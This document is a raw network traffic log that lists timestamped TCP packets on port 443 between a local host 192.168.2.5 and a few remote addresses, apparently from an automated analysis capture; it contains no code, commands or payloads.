Nov 25, 2024 11:34:45.310390949 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.310461044 CET	50076	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.310610056 CET	50076	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.310621023 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.345324993 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.348407984 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.348464012 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.348465919 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.348517895 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.348573923 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.348596096 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.348607063 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.348613024 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.351835966 CET	50077	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.351869106 CET	443	50077	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.351970911 CET	50077	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.352350950 CET	50077	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.352360964 CET	443	50077	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.444380999 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.444925070 CET	50072	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.444952011 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.445382118 CET	50072	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.445386887 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.888060093 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.891215086 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.891333103 CET	50072	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.892055035 CET	50072	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.892055035 CET	50072	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.892076015 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.892086983 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.893924952 CET	50078	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.893960953 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.894047976 CET	50078	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.894228935 CET	50078	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.894241095 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:46.189697981 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:46.189800978 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:46.189826965 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:46.189886093 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:46.189968109 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:46.189968109 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:46.190102100 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:46.190115929 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:46.973840952 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:46.974396944 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:46.974416018 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:46.975109100 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:46.975115061 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.074820995 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.075400114 CET	50075	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.075407982 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.075860023 CET	50075	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.075866938 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.136060953 CET	443	50077	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.141388893 CET	50077	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.141407967 CET	443	50077	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.142081976 CET	50077	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.142087936 CET	443	50077	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.152460098 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.155309916 CET	50076	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.155309916 CET	50076	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.155334949 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.155349016 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.428061962 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.430931091 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.431036949 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.431045055 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.431240082 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.431260109 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.431274891 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.431288958 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.431293964 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.434261084 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.434289932 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.434592962 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.434808969 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.434824944 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.531294107 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.534406900 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.534552097 CET	50075	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.534603119 CET	50075	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.534603119 CET	50075	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.534611940 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.534620047 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.537144899 CET	50080	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.537180901 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.537341118 CET	50080	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.537471056 CET	50080	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.537487984 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.582437992 CET	443	50077	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.585144997 CET	443	50077	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.586361885 CET	50077	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.586361885 CET	50077	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.588598967 CET	50077	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.588599920 CET	50081	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.588613987 CET	443	50077	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.588634968 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.588901997 CET	50081	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.588901997 CET	50081	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.588937998 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.606673002 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.610106945 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.610147953 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.610177994 CET	50076	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.610245943 CET	50076	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.610245943 CET	50076	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.610532045 CET	50076	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.610541105 CET	443	50076	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.612201929 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.612217903 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.612320900 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.612494946 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.612508059 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.677571058 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.678046942 CET	50078	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.678057909 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:47.678524971 CET	50078	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:47.678529024 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:48.120915890 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:48.125207901 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:48.125281096 CET	50078	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:48.127392054 CET	50078	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:48.127410889 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:48.127423048 CET	50078	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:48.127429008 CET	443	50078	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:48.135122061 CET	50083	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:48.135169029 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:48.135246038 CET	50083	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:48.135413885 CET	50083	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:48.135430098 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.216350079 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.216859102 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.216886997 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.217345953 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.217355013 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.255577087 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.265286922 CET	50080	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.265306950 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.265717983 CET	50080	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.265724897 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.327167988 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.330190897 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.330207109 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.330672026 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.330677032 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.446135998 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.446742058 CET	50081	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.446769953 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.447175026 CET	50081	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.447181940 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.786356926 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.786432981 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.786550999 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.786556005 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.786740065 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.786761999 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.786776066 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.786776066 CET	50079	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.786784887 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.786791086 CET	443	50079	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.789311886 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.789324045 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.789418936 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.789611101 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.789625883 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834491014 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834527969 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834556103 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834614992 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834623098 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834650040 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.834688902 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.834929943 CET	50080	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.834929943 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.834954023 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834966898 CET	50080	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.834966898 CET	50082	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.834966898 CET	50080	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.834973097 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834983110 CET	443	50082	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.834989071 CET	443	50080	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.837749004 CET	50085	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.837788105 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.837833881 CET	50086	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.837845087 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.837858915 CET	50085	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.837892056 CET	50086	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.838025093 CET	50085	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.838037968 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.838047028 CET	50086	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.838058949 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.917553902 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.918160915 CET	50083	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.918183088 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.918760061 CET	50083	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.918765068 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.974734068 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.978003979 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.978081942 CET	50081	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.978105068 CET	50081	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.978105068 CET	50081	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.978121042 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.978131056 CET	443	50081	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.980778933 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.980815887 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:49.980880976 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.981039047 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:49.981050968 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:50.361764908 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:50.364927053 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:50.368103981 CET	50083	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:50.368350983 CET	50083	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:50.368350983 CET	50083	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:50.368374109 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:50.368383884 CET	443	50083	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:50.370917082 CET	50088	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:50.370954990 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:50.371404886 CET	50088	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:50.371680021 CET	50088	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:50.371699095 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.425133944 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.425784111 CET	50085	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.425811052 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.426250935 CET	50085	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.426255941 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.570312023 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.571026087 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.571041107 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.571513891 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.571520090 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.688193083 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.688898087 CET	50086	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.688911915 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.689479113 CET	50086	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.689482927 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.695241928 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.695558071 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.695583105 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.696043015 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.696048021 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.867515087 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.870775938 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.870857954 CET	50085	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.870937109 CET	50085	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.870959997 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.870971918 CET	50085	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.870979071 CET	443	50085	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.874283075 CET	50089	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.874305964 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:51.874387980 CET	50089	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.874568939 CET	50089	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:51.874582052 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.013513088 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.016988039 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.017055035 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.017075062 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.017091990 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.017165899 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.017214060 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.017225981 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.017241001 CET	50084	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.017246008 CET	443	50084	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.020277977 CET	50090	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.020313025 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.020402908 CET	50090	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.020576000 CET	50090	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.020591021 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.139826059 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.142934084 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.143022060 CET	50086	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.143069029 CET	50086	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.143076897 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.143086910 CET	50086	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.143090963 CET	443	50086	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.145998955 CET	50091	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.146015882 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.146101952 CET	50091	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.146279097 CET	50091	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.146291018 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.150991917 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.151386023 CET	50088	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.151403904 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.151830912 CET	50088	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.151834965 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.322145939 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.325225115 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.325268984 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.325277090 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.325329065 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.325417995 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.325439930 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.325450897 CET	50087	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.325458050 CET	443	50087	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.328476906 CET	50092	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.328511000 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.328584909 CET	50092	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.328746080 CET	50092	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.328758001 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.593996048 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.597492933 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.597593069 CET	50088	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.597637892 CET	50088	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.597656012 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.597667933 CET	50088	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.597672939 CET	443	50088	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.600389957 CET	50093	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.600440979 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:52.600526094 CET	50093	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.600670099 CET	50093	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:52.600680113 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.719425917 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.719852924 CET	50089	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:53.719865084 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.720508099 CET	50089	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:53.720513105 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.804866076 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.805316925 CET	50090	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:53.805332899 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.806148052 CET	50090	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:53.806154966 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.926651955 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.927081108 CET	50091	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:53.927092075 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:53.927623034 CET	50091	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:53.927628040 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.120354891 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.120888948 CET	50092	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.120917082 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.121421099 CET	50092	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.121427059 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.171799898 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.175260067 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.175329924 CET	50089	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.175425053 CET	50089	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.175436974 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.175446033 CET	50089	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.175451040 CET	443	50089	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.178364992 CET	50094	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.178397894 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.178522110 CET	50094	443	192.168.2.5	13.107.246.63
